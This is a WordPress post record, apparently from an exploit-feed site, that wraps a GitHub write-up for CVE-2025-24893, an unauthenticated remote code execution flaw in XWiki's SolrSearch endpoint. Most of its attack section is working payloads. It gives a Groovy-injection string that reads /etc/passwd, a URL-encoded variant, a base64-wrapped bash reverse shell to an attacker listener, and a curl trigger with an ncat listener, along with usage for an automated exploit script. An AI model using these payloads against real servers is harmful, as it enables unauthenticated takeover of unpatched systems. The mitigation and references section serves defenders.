{"id":10532,"date":"2025-08-13T04:43:57","date_gmt":"2025-08-13T04:43:57","guid":{"rendered":"http:\/\/localhost\/?p=10532"},"modified":"2025-08-13T04:43:57","modified_gmt":"2025-08-13T04:43:57","slug":"exploit-for-code-injection-in-xwiki","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=10532","title":{"rendered":"Exploit for Code Injection in Xwiki_3FC9E9A2-42CE-552A-A046-E205E2471000"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-08-13T08:36:43&#8243;,&#8221;description&#8221;:&#8221;# CVE-2025-24893 \u2013 Unauthenticated Remote Code Execution in XWiki  \\n\\n## 0  Table of Contents\\n1. [Summary](#1-summary)\\n2. [Vulnerability Details](#2-vulnerability-details)\\n3. [Affected Versions](#3-affected-versions)\\n4. [Proof-of-Concept](#5-proof-of-concept)\\n   * 4.1 [Building the payload](#51-build-the-payload)\\n   * 4.2 [Manual exploitation](#52-manual-exploitation)\\n   * 4.3 [Automated python exploit](#53-automated-exploit)\\n5. [Mitigation](#6-mitigation)\\n6. [Credits \\u0026 References](#7-credits&#8211;references)\\n\\n&#8212;\\n\\n## 1  Summary \\n\\n* **CVE:** 2025-24893  \\n* **Component:** `SolrSearch` macro (XWiki UI)  \\n* **Severity:** 9.8 \/ CRITICAL (CVSS 3.1)  \\n* **Attack vector:** Unauthenticated HTTP GET  \\n* **Impact:** Arbitrary Groovy execution \u2192 system-level RCE (permissions of the Jetty\/Tomcat user)  \\n\\nThe `\/xwiki\/bin\/get\/Main\/SolrSearch` endpoint concatenates untrusted `text=` input\\nstraight into a Freemarker template.  \\nBy prematurely closing the template and opening a new `{{groovy}} \u2026 {{\/groovy}}`\\nblock, an attacker executes arbitrary Groovy code without authentication.\\n\\n&#8212;\\n\\n## 2  Vulnerability Details \\n\\n&#8220;`\\nGET \/xwiki\/bin\/get\/Main\/SolrSearch?media=rss\\\\\\u0026text=\\u003e\\u003e  HTTP\/1.1\\n&#8220;&#8220;\\n\\n`SolrSearch` should embed the supplied text as plain content, but the macro\\nhandler **fails to escape `}}}`**, so the following happens:\\n\\n1. `}}}`\u2003closes the current Freemarker block.  \\n2. Attacker opens a **new macro**:  \\n&#8220;`xwiki\\n   {{async async=false}}{{groovy}} \u2026 {{\/groovy}}{{\/async}}\\n&#8220;`\\n\\n* `async=false` forces synchronous execution (works even for guests).\\n\\n3. Groovy runs with the permissions of the XWiki JVM process.\\n\\nA minimal PoC that prints `\/etc\/passwd`:\\n\\n&#8220;`text\\n}}}{{async async=false}}{{groovy}}println(\\&#8221;cat \/etc\/passwd\\&#8221;.execute().text){{\/groovy}}{{\/async}}\\n&#8220;`\\n\\nURL-encoded variant (spaces \u2192 `%20`, braces \u2192 `%7B\/%7D`, etc.):\\n\\n&#8220;`\\n%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22cat%20\/etc\/passwd%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d\\n&#8220;`\\n\\n&#8212;\\n\\n## 3  Affected Versions \\n\\n| Branch   | Fixed in                                   | Vulnerable \u2264                     |\\n| &#8212;&#8212;&#8211; | &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; | &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211; |\\n| 15.x     | **15.10.11**                               | 15.10.10\u2003(and all 15.9 \/ 15.8 \u2026) |\\n| 14.x LTS | **14.10.17**                               | 14.10.16                         |\\n| 13 \/ 12  | **Not maintained** \u2013 all remain vulnerable |                                  |\\n\\n*(source: [OffSec advisory](https:\/\/www.offsec.com\/blog\/cve-2025-24893\/) \\u0026 XWiki\\nSEC-S 2025-02)*\\n\\n![endpoint](images\/XWiki_ver.png)\\n\\n&#8212;\\n\\n## 5  Proof of Concept \\n\\n### 5.1  Build the payload \\n\\n&#8220;`bash\\nRHOST=\\&#8221;editor.htb:8080\\&#8221;\\nLHOST=\\&#8221;10.10.14.8\\&#8221;\\nLPORT=4444\\n\\n# 1.   one-liner reverse shell\\nSHELL=\\&#8221;bash -c &#8216;bash -i \\u003e\\u0026 \/dev\/tcp\/$LHOST\/$LPORT 0\\u003e\\u00261&#8217;\\&#8221;\\n\\n# 2.   Base64 (single line)\\nB64=$(echo -n \\&#8221;$SHELL\\&#8221; | base64 -w0)\\n\\n# 3.   wrap in Groovy macro\\nRAW=&#8217;}}}{{async async=false}}{{groovy}}\\&#8221;bash -c {echo,&#8217;$B64&#8242;}|{base64,-d}|{bash,-i}\\&#8221;.execute(){{\/groovy}}{{\/async}}&#8217;\\n\\n# 4.   URL-encode\\nPAYLOAD=$(python3 -c \\&#8221;import urllib.parse,sys;print(urllib.parse.quote(sys.argv[1],safe=&#8221;))\\&#8221; \\&#8221;$RAW\\&#8221;)\\n&#8220;`\\n\\n### 5.2  Manual exploitation \\n\\n&#8220;`bash\\n# start listener\\nsudo ncat -lvnp 4444\\n\\n# trigger exploit\\ncurl \\&#8221;http:\/\/$RHOST\/xwiki\/bin\/get\/Main\/SolrSearch?media=rss\\u0026text=${PAYLOAD}\\&#8221;\\n&#8220;`\\n\\n### 5.3  Automated exploit \\n\\n`xwiki_solr_rce.py` ships in `exploit\/` (see code block below).\\n\\n&#8220;`bash\\npython CVE-2025-24893.py -u  -l  -p \\n&#8220;`\\nwhere\\n&#8220;`\\n &#8211; URL including http:\/\/ or https:\/\/\\n&#8220;`\\n*(pass `-c \\&#8221;id\\&#8221;` to run an arbitrary command instead of a shell)*\\n![exploit](images\/running_exploit.png)\\n![revshell](images\/reverse_shell.png)\\n\\n&#8212;\\n\\n## 6  Mitigation \\n\\n* **Upgrade** to **15.10.11** \/ **14.10.17** or later\\n* Temporary workaround: disable the macro\\n\\n&#8220;`properties\\n# \/etc\/xwiki\/xwiki.properties\\nsolr.search.enabled = false\\n&#8220;`\\n\\n&#8212;\\n\\n## 7  Credits \\u0026 References \\n\\n* OffSec Research: \u201cUnauth RCE in XWiki\u201d \u2013 20 Feb 2025\\n* NVD entry: [https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2025-24893](https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2025-24893)\\n* [Exploit-DB #52136](https:\/\/www.exploit-db.com\/exploits\/52136)\\n\\n\\u003e Research \\u0026 PoC: **DeX1d**\\n\\n&#8212;\\n\\n\\u003eDisclaimer:\u2003For educational use only. Running this against systems you do not own is illegal.\\n&#8221;,&#8221;published&#8221;:&#8221;2025-08-07T10:20:22&#8243;,&#8221;modified&#8221;:&#8221;2025-08-09T10:15:33&#8243;,&#8221;type&#8221;:&#8221;githubexploit&#8221;,&#8221;title&#8221;:&#8221;Exploit for Code Injection in Xwiki&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;3FC9E9A2-42CE-552A-A046-E205E2471000&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-24893&#8243;],&#8221;sourceData&#8221;:&#8221;&#8221;,&#8221;sourceHref&#8221;:&#8221;&#8221;,&#8221;cvss&#8221;:{&#8220;score&#8221;:9.8,&#8221;severity&#8221;:&#8221;CRITICAL&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/github.com\/IIIeJlyXaKapToIIIKu\/CVE-2025-24893-XWiki-unauthenticated-RCE-via-SolrSearch&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-08-13T08:36:43&#8243;,&#8221;description&#8221;:&#8221;# CVE-2025-24893 \u2013 Unauthenticated Remote Code Execution in XWiki \\n\\n## 0 Table of Contents\\n1. [Summary](#1-summary)\\n2. [Vulnerability Details](#2-vulnerability-details)\\n3. [Affected Versions](#3-affected-versions)\\n4. [Proof-of-Concept](#5-proof-of-concept)\\n * 4.1 [Building the payload](#51-build-the-payload)\\n&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,32,13,7,11,5],"class_list":["post-10532","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-githubexploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Exploit for Code Injection in Xwiki_3FC9E9A2-42CE-552A-A046-E205E2471000 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=10532\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Exploit for Code Injection in Xwiki_3FC9E9A2-42CE-552A-A046-E205E2471000 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2025-08-13T08:36:43&#8243;,&#8221;description&#8221;:&#8221;# CVE-2025-24893 \u2013 Unauthenticated Remote Code Execution in XWiki nn## 0 Table of Contentsn1. [Summary](#1-summary)n2. [Vulnerability Details](#2-vulnerability-details)n3. [Affected Versions](#3-affected-versions)n4. [Proof-of-Concept](#5-proof-of-concept)n * 4.1 [Building the payload](#51-build-the-payload)n...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=10532\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-08-13T04:43:57+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=10532#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=10532\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"Exploit for Code Injection in Xwiki_3FC9E9A2-42CE-552A-A046-E205E2471000\",\"datePublished\":\"2025-08-13T04:43:57+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=10532\"},\"wordCount\":755,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.8\",\"exploit\",\"githubexploit\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=10532#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=10532\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=10532\",\"name\":\"Exploit for Code Injection in Xwiki_3FC9E9A2-42CE-552A-A046-E205E2471000 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-08-13T04:43:57+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=10532#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=10532\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=10532#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Exploit for Code Injection in Xwiki_3FC9E9A2-42CE-552A-A046-E205E2471000\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Exploit for Code Injection in Xwiki_3FC9E9A2-42CE-552A-A046-E205E2471000 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=10532","og_locale":"en_US","og_type":"article","og_title":"Exploit for Code Injection in Xwiki_3FC9E9A2-42CE-552A-A046-E205E2471000 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2025-08-13T08:36:43&#8243;,&#8221;description&#8221;:&#8221;# CVE-2025-24893 \u2013 Unauthenticated Remote Code Execution in XWiki nn## 0 Table of Contentsn1. [Summary](#1-summary)n2. [Vulnerability Details](#2-vulnerability-details)n3. [Affected Versions](#3-affected-versions)n4. [Proof-of-Concept](#5-proof-of-concept)n * 4.1 [Building the payload](#51-build-the-payload)n...","og_url":"https:\/\/zero.redgem.net\/?p=10532","og_site_name":"zero redgem","article_published_time":"2025-08-13T04:43:57+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=10532#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=10532"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"Exploit for Code Injection in Xwiki_3FC9E9A2-42CE-552A-A046-E205E2471000","datePublished":"2025-08-13T04:43:57+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=10532"},"wordCount":755,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.8","exploit","githubexploit","news","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=10532#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=10532","url":"https:\/\/zero.redgem.net\/?p=10532","name":"Exploit for Code Injection in Xwiki_3FC9E9A2-42CE-552A-A046-E205E2471000 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-08-13T04:43:57+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=10532#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=10532"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=10532#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"Exploit for Code Injection in Xwiki_3FC9E9A2-42CE-552A-A046-E205E2471000"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/10532","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=10532"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/10532\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=10532"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=10532"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=10532"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}